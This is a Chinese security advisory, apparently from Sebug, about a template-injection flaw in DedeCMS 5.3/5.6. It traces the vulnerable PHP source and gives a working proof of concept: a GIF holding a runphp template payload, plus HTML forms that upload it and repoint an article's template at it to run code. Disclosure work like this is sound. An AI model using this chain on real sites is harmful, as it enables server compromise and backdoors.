漏洞版本:
DEDECMS 5.3/5.6
漏洞描述:
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。
article_add.php
1. ........................
2. else if($dopost=='save')
3. {
4. include(DEDEMEMBER.'/inc/archives_check.php');
5.
6. //分析处理附加表数据
7. $inadd_f = $inadd_v = '';
8. if(!emptyempty($dede_addonfields))
9. {
10. $addonfields = explode(';',$dede_addonfields);
11. ............................................ //省略部份代码
12. $inadd_f .= ','.$vs[0];
13. $inadd_v .= " ,'".${$vs[0]}."' ";
14. }
15. }
16. }
17. ..........................................
18. $addtable = trim($cInfos['addtable']);
19. if(emptyempty($addtable))
20. {
21. ......................................
22. }
23. else
24. {
25. $inquery = "INSERT INTO `{$addtable}`(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
26. if(!$dsql->ExecuteNoneQuery($inquery))
27. {
28. ..........................................
29. }
30. }
31. ..........................................
32. $artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定义)
33.
34.
35. function MakeArt($aid,$ismakesign=false)
36. {
37. global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
38. include_once(DEDEINC.'/arc.archives.class.php');
39. if($ismakesign)
40. {
41. $envs['makesign'] = 'yes';
42. }
43. $arc = new Archives($aid);
44. $reurl = $arc->MakeHtml(); //arc.archives.class.php有定义
45. ............................
46. }
arc.archives.class.php
1. class Archives
2. {
3. ................
4. function __construct($aid)
5. {
6. ............
7. if($this->ChannelUnit->ChannelInfos['addtable']!='')
8. {
9. $query = "SELECT * FROM `{$this->ChannelUnit->ChannelInfos['addtable']}` WHERE `aid` = '$aid'";
10. $this->addTableRow = $this->dsql->GetOne($query);
11. }
12. ........................
13. if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
14. {
15. if(is_array($this->addTableRow))
16. {
17. ...............................
18. $this->Fields['templet'] = $this->addTableRow['templet'];//注意1
19. ......................................
20. }
21. }
22. .............................
23. }
24.
25. function MakeHtml($isremote=0)
26. {
27. global $cfg_remote_site,$fileFirst;
28. if($this->IsError)
29. {
30. return '';
31. }
32. $this->Fields["displaytype"] = "st";
33. //预编译$th
34. $this->LoadTemplet(); //触发1
35.
36. ......................................//省略部份代码
37. $this->ParseDMFields($i,1);
38. $this->dtp->SaveTo($truefilename); //触发2
39. ......................................
40. }
41. 继续跟(触发1)$this->LoadTemplet(); //arc.archives.class.php有定义
42.
43. function LoadTemplet()
44. {
45. if($this->TempSource=='')
46. {
47. $tempfile = $this->GetTempletFile(); //注意2
48. if(!file_exists($tempfile) || !is_file($tempfile))
49. {
50. echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}<br />";
51. echo "模板文件不存在,无法解析文档!";
52. exit();
53. }
54. $this->dtp->LoadTemplate($tempfile); //触发3
55. $this->TempSource = $this->dtp->SourceString;
56. }
57. else
58. {
59. $this->dtp->LoadSource($this->TempSource);
60. }
61. }
62.
63. 看注意2 的$this->GetTempletFile() //arc.archives.class.php有定义
64.
65. function GetTempletFile()
66. {
67. global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
68. $cid = $this->ChannelUnit->ChannelInfos['nid'];
69. if(!emptyempty($this->Fields['templet'])) //注意3
70. {
71. $filetag = MfTemplet($this->Fields['templet']);
72. if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
73. }
74. else
75. {
76. $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
77. }
78. .......................................
79. if($cid=='spec')
80. {
81. if( !emptyempty($this->Fields['templet']) )
82. {
83. $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
84. }
85. else
86. {
87. $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
88. }
89. }
90. ...........................................
91. return $tmpfile;
92. }
注意3中的值来自注意1是通过查表得来的,控制了它就等于控制了任意模板,然后通过触发3来触发漏洞
看下怎么控制注意1的值
article_edit.php
1. ......................
2. else if($dopost=='save')
3. { ....................
4. if(!emptyempty($dede_addonfields))
5. {
6. $addonfields = explode(';',$dede_addonfields);
7. if(is_array($addonfields))
8. {
9. ........................
10. ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
11. $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
12.
13. }
14. }
15. ...................
16. if($addtable!='')
17. {
18. $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
19. if(!$dsql->ExecuteNoneQuery($upQuery))
20. {..............
21. }
22. }
23. ....................
24. }
$dede_addonfields没有过滤,我们可以构造$inadd_f为,templet='上传的模板图片地址',包含我们的图片后,再通过触发2来生成图片里的后门!
<* 参考
http://hi.baidu.com/mr_xhming/blog/item/5e1368b2dea0bbaad9335ab2.html*>
http://sebug.net/appdir/织梦(DedeCms)
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- Gif89a{dede:field name='toby57' runphp='yes'}
- phpinfo();
- {/dede:field}
- 保存为1.gif
- 1. <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
- 2.<input type="hidden" name="aid" value="7"/>
- 3.<input type="hidden" name="mediatype" value="1"/>
- 4.<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif"/></br>
- 5.<input type="hidden" name="dopost" value="save"/>
- 6.<input name="title" type="hidden" id="title" value="1.jpg"class="intxt"/>
- 7.<input name="addonfile" type="file" id="addonfile"/>
- 8.<button class="button2" type="submit">更改</button>
- 9.</form>
- 构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
- 发表文章,然后构造修改表单如下:
- 1.<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
- 2.<input type="hidden" name="dopost" value="save"/>
- 3.<input type="hidden" name="aid" value="2"/>
- 4.<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd"/>
- 5.<input type="hidden" name="channelid" value="1"/>
- 6.<input type="hidden" name="oldlitpic" value=""/>
- 7.<input type="hidden" name="sortrank" value="1282049150"/>
- 8.<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100"class="intxt"/>
- 9.<input type="text" name="writer" id="writer" value="123456" maxlength="100"class="intxt" style="219px"/>
- 10.<select name='typeid' size='1'>
- 11.<option value='1'class='option3' selected=''>Test</option>
- 12. <select name='mtypesid' size='1'>
- 13. <option value='0' selected>请选择分类...</option>
- 14.<option value='1'class='option3' selected>aa</option></select>
- 15.<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
- 16. <input type='hidden' name='dede_addonfields' value="templet">
- 17. <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
- 18. <input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
- 19. <button class="button2" type="submit">提交</button>
- 20. </form>